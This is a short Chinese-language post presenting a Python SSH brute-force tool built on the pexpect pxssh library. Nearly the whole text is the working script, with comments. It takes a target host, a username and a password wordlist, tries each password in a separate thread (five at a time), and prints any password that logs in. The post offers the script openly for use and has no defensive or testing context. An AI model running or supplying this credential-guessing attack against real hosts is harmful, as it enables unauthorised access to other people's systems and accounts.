一、工具说明
利用pxssh库进行暴力破解ssh
二、演示一下的利用效果
三、代码+注释
from pexpect import pxssh
import argparse
import threading
maxConnetions = 5
connect_lock = threading.BoundedSemaphore(value=maxConnetions)
def connect(host, user, password):
try:
s = pxssh.pxssh()
# 登录ssh测试
s.login(host, user, password)
print("[+] Password Found: {}".format(password))
except pxssh.ExceptionPxssh as e:
pass
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-H', dest='Host', help="like: 192.168.3.1")
parser.add_argument('-F', dest='passwdFile', help="like: /root/pass.txt")
parser.add_argument('-u', dest='user')
args = parser.parse_args()
host = args.Host
passwdFile = args.passwdFile
user = args.user
with open(passwdFile, 'r') as f:
for line in f.readlines():
with connect_lock:
password = line.strip('\n')
print("[-] Testing: {}".format(password))
# 起线程每个密码尝试登录一次
t = threading.Thread(target=connect, args=(host, user, password))
t.start()
if __name__ == '__main__':
main()
